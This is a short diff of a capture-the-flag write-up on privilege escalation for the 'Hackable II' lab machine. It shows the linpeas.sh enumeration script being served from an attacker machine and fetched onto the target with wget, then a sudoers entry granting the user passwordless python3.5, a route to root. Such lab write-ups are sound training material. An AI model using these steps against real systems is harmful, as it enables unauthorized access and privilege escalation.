Maskrpone/CTFs/writeups/Hackable II.md

 # Privilege escalation's vectors :

->[!important] Scanning for a vector of attack
+> Scanning for a vector of attack
 >- We import from our attacking machine the `linpeas.sh` script, which is very efficient (`python -m http.server 8000` on the attacker device and `wget http://10.38.1.110:8000/linpeas.sh` from the ssh connection to the target device)

 > We then wait for the script to terminate.

 # Root access

->[!hint] We find, in the linpeas' script's output, that our user have all privileges with python3.5 :
+> We find, in the linpeas' script's output, that our user have all privileges with python3.5 :
 >```sh
 >shrek ALL = NOPASSWD:/usr/bin/python3.5
 >```